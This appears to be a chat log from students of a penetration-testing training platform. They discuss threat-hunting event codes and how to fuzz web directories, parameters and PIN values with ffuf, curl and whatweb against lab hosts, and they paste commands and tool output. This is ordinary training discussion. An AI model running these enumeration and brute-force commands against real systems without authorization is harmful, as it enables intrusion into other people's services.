Leverage event.code 13 and make sure that your query matches the case of the registry.path field.

For sysmon yes I agree there isn't a lot of IDs however for Hunt#3 for example

Leverage event.code 4104 and the powershell.file.script_block_text field.

yes, I'm wondering how I could find event 4104

check which logs ur using

zeek or windows

update nikto

even searching to Google with "powershell lateral movement windows id" I got a bunch of event ID except this one

https://www.ired.team/offensive-security/lateral-movement/t1028-winrm-for-lateral-movement

I read that but "4104" is not mentionned

it is the latest

then use gobuster or ffuf for virtualhost bruteforcing

but do they give me service informations? so far i tried them and only found the subdomains

Alright, I'll try to get better, it's just it doesn't click yet in my head

how to get information on a kown subdomain

u need to find the version its in the section read it carefully

its very easy and dont forget to change hosts file and add teh ip of those vhost

okey ill try ffuf and read the man

something thats pretty cool (but a lot of information) is the sans posters on dfir. Look at this one for example (https://www.sans.org/posters/hunt-evil/) it talks about whats normal behavior and then shows common ways to detect lateral movement techniques and what event codes/registry entires/files are associated with it. They have a few of these posters

@tranquil axle Thanks!

Hi everyone,

I'm currently working on the Brute Force Attack module, specifically the first exercise where we need to determine a PIN by brute forcing.

Before this module, we learned about ffuf. In the exercise, we are given the parameter to brute force (in this case, the PIN). However, I’m wondering what we would do if we weren’t provided with the parameter name (e.g., pin).

I tried using ffuf to discover the parameter, following the techniques we learned in the ffuf module. Unfortunately, this approach didn’t yield any results.

Does anyone have suggestions for identifying the correct parameter when it’s not explicitly provided?

Thanks!

Viewing the source code?

The answer is for my question?

yes

so there is no source code at all

The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.

this is what is given when you browse the web app

so i used fuff and determine that a dircetory called oin is peresent

idk what you're asking here, but you can view the elemnt id's by inspecting the source code, or maybe running the pages through burp

ffuf -u http://94.237.59.16:44890/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

    /'___\  /'___\           /'___\       
   /\ \__/ /\ \__/  __  __  /\ \__/       
   \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
     \ \_\   \ \_\  \ \____/  \ \_\       
      \/_/    \/_/   \/___/    \/_/       

   v2.1.0-dev

:: Method : GET
:: URL : http://94.237.59.16:44890/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500

pin [Status: 401, Size: 29, Words: 2, Lines: 2, Duration: 98ms]

so fuff gave me the directory

ok what does fuzzing for directories with ffuf have to do with brute forcing a pin?

i don't understand your question

fuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://94.237.59.16:44890/pin?FUZZ=value -fs 29

we need to get the parameter to determine where to bruteforce right?

directory > parameter determination > value bruteforcing

which module and section are you on

Brute forcing attacks

do you mean login brute forcing?

yes

ok and which section?

Brute Forcing attacks > Brute Forcing attacks

that section tells you the endpoint

yes but thats not the real worls schenario

world*

ok but i explained that already

source code, inspecting requests in burp

surce code does not have anything

yes it does

http:<IP>:<PORT>

It does only say URL not found (404 error)

Information Gathering - Web Edition > Fingerprinting
Which CMS is used on app.inlanefreight.local on the target system? Respond with the name only, e.g., WordPress

i tried everything i can think off, can i pm anyone who could able to guide me a little to understand how to get cms

you asked about real world and now you're referring to the module? so what is your question for, the real world or the module?

best to say the module/section you're on

Information Gathering - Web Edition > Fingerprinting

wanted to ask that if in fufff module, this thing worked why its not working here?

fuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://94.237.59.16:44890/pin?FUZZ=value -fs 29

To get me the value of the parameter?

because the url you're using is not correct. reivew the python code they provide and you can see the url they use.

http://<ip>:<port>/pin?"pin"={formatted_pin} -> i am trying to fuzz "pin"

right, that's why it's not working

I'm sorry may, be I'm wrong I still can't follow why it's not working!!

you're fuzzing the query parameter not the value

yes thats what i want to get to!!

He's searching for "pin" as the parameter, he hasn't found that one yet ;p

exactly!!!

what does the question say?

As there was in fuff module we do 1.) directory fuzzing > 2.) then parameter fuzzing > 3.)the value fuzzing/bruteforcing

I am at 2nd step parameter fuzzing!! not the value

Which CMS is used on app.inlanefreight.local on the target system? Respond with the name only, e.g., WordPress

use whatweb for that

i trying that

more aggressive

the command doesnt change much

wanted to ask that if in fufff module, this thing worked why its not working here?

fuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://94.237.59.16:44890/pin?FUZZ=value -fs 29

nothing come up!!

Idiot check on my end, can you add a :FUZZ to the end of your wordlist definition?

do you need to modify /etc/hosts ?

yes

Was my second bit of advice yeh

Wasn't a question for myself hahaha more of a "can you try this and report back" type question

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://94.237.59.16:44890/pin?FUZZ=value -fs 29

nothing came up by this as well

hi, i am currently at the Nibbles part of my getting started module in CPTS and i was wondering how do i install LinEnum.sh, i dont think i have done it correctly as when i start the server, it does not run the script and give a ip

doesnt really make a difference in this case

google

its because the query parameter doesn't matter here, you're getting the same response size from each word in your list

again, what's that got to do with something in the real world? your question was about real world but you keep going back to the module

so i real work this will work?

it all depends on the site

i told you exactly how to find it already

are you fuzzing the right url?

yup i did get the directory using this

ffuf -u http://94.237.59.16:44890/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

    /'___\  /'___\           /'___\       
   /\ \__/ /\ \__/  __  __  /\ \__/       
   \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
     \ \_\   \ \_\  \ \____/  \ \_\       
      \/_/    \/_/   \/___/    \/_/       

   v2.1.0-dev

:: Method : GET
:: URL : http://94.237.59.16:44890/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500

pin [Status: 401, Size: 29, Words: 2, Lines: 2, Duration: 98ms]

okay

does this module instruct you to add an entry in your hosts file?

thanks so much for the helpful assistance

nope

you're welcome

ping me if you need more help

okay, have you tried filtering by size?

i did -fs 29

check you dm

your*

ffuf -w testsss -u http://94.237.59.16:44890/pin?FUZZ=value

    /'___\  /'___\           /'___\       
   /\ \__/ /\ \__/  __  __  /\ \__/       
   \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
     \ \_\   \ \_\  \ \____/  \ \_\       
      \/_/    \/_/   \/___/    \/_/       

   v2.1.0-dev

:: Method : GET
:: URL : http://94.237.59.16:44890/pin?FUZZ=value
:: Wordlist : FUZZ: /home/taresh/testsss
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500

jshbdhbhf [Status: 401, Size: 29, Words: 2, Lines: 2, Duration: 100ms]
pin [Status: 401, Size: 29, Words: 2, Lines: 2, Duration: 101ms]
dhbhsd [Status: 401, Size: 29, Words: 2, Lines: 2, Duration: 101ms]
hsbdhb [Status: 401, Size: 29, Words: 2, Lines: 2, Duration: 101ms]

fuff cant see the difference pin have the same status, same size

has anybody done the corperate OSINT module? i was thinking about doing it however its alot of cubes so i just wanna know what peoples thoughts on the module are

i'm using ligolo and my connection dies, if I try to start_tunnel again after reconnecting the agent I get:

error: a tunnel is already using this interface name. Please use a different name using the --tun option
I can't find any way of releasing that tunnel... tunnel_stop doesn't recognize it as in use. Anyone run into this and figure out a solution?

does it show in your network interfaces? ip link show

I just remake the interface

Easy enough to create a new one I guess, I was hoping to just stop the old one instead of creating ligolo2..3..4

Delete the old one

if you know it’s gonna die then stop the tunnel first

That only happens to me sometimes tho, maybe you need a stable version

Had problems with the latest and been using 0.6.2 ever since

Thanks for asking, I shut the whole thing down so I can't check now but I'm sure it was in there. It's the start_tunnel command in the ligolo console that seems to be stuck. I'll keep an eye on downgrading to 0.6.2 as TLattice suggests just in case that's it. It might just be the janky connection I've got.

no

ligolo is a life changer i wished they added it to the pivoting module

When you have a GET or POST you need to fuzz like 'FUZZ=key" how do you figure out that key is the right one?

Like you're also taught 'FUZZ=x' and FUZZ=y' in the modules

How do you know that x, y or key is correct

Curling empty post requests just says "access denied" and nothing useful.

Like if it returned "invalid parameter y="

because you filter out the bad responses

But if I start fuzzing "x=FUZZ" for get and the actual correct one is something like ?y=1 then every response will be wrong

examine the requests to find out

So I just insert random words until it does something?

sounds like it will take forever

no you can fuzz it or observe the behavior of the website with your browser or burp or something

I mean the modules tell you how to fuzz the second part of the something=something. But they don't tell you how to fuzz the first part

In the module they just give you that the correct get request is ?x=something and the correct post request is y=something

But I want to know how you get the x and y

i just told you.. fuzz it or observe it

thats what fuzzing means

I tried manually several times but the message just remains the same

which module/section/question is this about

Web Fuzzing skills assesment

web fuzzing?

which module... and what's your actual question here

Like I did

curl -d "key="  http://94.237.48.46:45074/admin/index.php 
curl -d "x="  http://94.237.48.46:45074/admin/index.php
curl -d "y="  http://94.237.48.46:45074/admin/index.php```

And they all returned the same access denied message

Which tells me nothing. Earlier in the module it would reply with something like "invalid parameter y=" telling me that y=fuzz is correct thing to fuzz

i haven't done this module but i know this isnt what you should be doing

yeah stick with what the module teaches

aren't you supposed to fuzz for possible parameters?

"+ 2 After completing all steps in the assessment, you will be presented with a page that contains a flag in the format of HTB{...}. What is that flag? "

"web fuzzing" is not a module

looks like you're to compose the right url from the previous questions?

oh geez ok

lol i was looking at my notes from cpts path, that's not in it so that makes sense

so you probably need to fuzz it, not do it manually

Hi guys

I'll just run "fuzz=" with burp suite parameters wordlist and see if it does anything different

can someone recommand a good wordlist from seclists thats good for value fuzzing

FUZZ=value

where value is unknown

make sure you're using the wordlists mentioned on that page "All fuzzing can be completed using the common.txt SecLists Wordlist, found at /usr/share/seclists/Discovery/Web-Content on Pwnbox, or via the SecLists GitHub."

@pine dune

thank you

in the cbbh exam or cpts I assume the common wordlist will be too easy for htb or am I mistaken?

it's against the rules to discuss the contents of the exam, however you can be assured everything in the exam is covered in the modules

depends on the situation presented to you

also I tried using a number wordlist from 1-1000 for username and users which I made. However as user and username tend to be string is it correcct to assume it SHOULD be a string and that the website wouldn't typically assign users by numbers

?

ok thanks

thank you

Im happy the 5 second timer is removed as well that was annoying asl

should I use the "usernames" directory?

as one of the parameters hinted towards that

its generally a small subset of use cases
at the very list the website will allow alphanumeric usernams where numbers are part of the string

yes

yea but im assuming a user or usernames from 1-1000 is too basic? even though this was shown to us in one of the earlier sections of the modules

thanks

should I use top-usernames?

I tried GET fuzzing with ?FUZZ=value and ?FUZZ = admin and POST fuzzing with FUZZ=value and FUZZ=admin and got nothing. Which is what I expected

yes

what module are u working on bro?

It could be FUZZ=ass for all I know which means every response would be wrong.

thanks

did you try visting the page in your browser?

contextualize your wordlist with questions like "does the website enforce any specific rules for usernames?"

Yes, it's just a page that says Access Denied